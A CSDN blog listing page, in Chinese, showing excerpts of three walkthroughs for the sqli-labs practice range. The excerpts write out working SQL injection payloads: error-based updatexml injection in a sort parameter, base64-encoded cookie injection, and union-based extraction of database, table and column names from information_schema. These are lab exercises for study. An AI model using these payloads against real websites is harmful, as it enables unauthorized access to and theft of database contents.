![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
sql注入
见痴
这个作者很懒,什么都没留下…
展开
-
sqli-labs靶场通关技巧(46-65)
Less46Order by注入,利用报错注入可以爆出数据库信息暴库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0));爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0));爆字段:?sort=1原创 2020-08-03 18:09:33 · 431 阅读 · 0 评论 -
sqli-labs靶场通关技巧(21-45)
Less21基于’)的cookie报头注入这里在cookie处加密了字符串,将我们的payload经过base64加密即可绕过暴库payload:-admin') union select 1,2,database()#爆表payload:-admin') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#爆字段payload:原创 2020-08-03 12:19:03 · 478 阅读 · 0 评论 -
sqli-labs靶场通关技巧(1-20)
Less1注入步骤:在参数后面加上单引号,数据库报错,说明存在注入id=1' and 1=1--+,返回正常id=1' and 1=2--+,返回数据为空,说明这是个基于单引号的字符型注入用二分法逐步判断字段数,此处有3个字段:id=1' order by 3--+确定回显点:id=-1' union select 1,2,3--+(参数1改成数据库不存在的值,如0或者负数)暴库payload:id=-1' union select 1,2,dat.原创 2020-07-26 22:54:13 · 2168 阅读 · 0 评论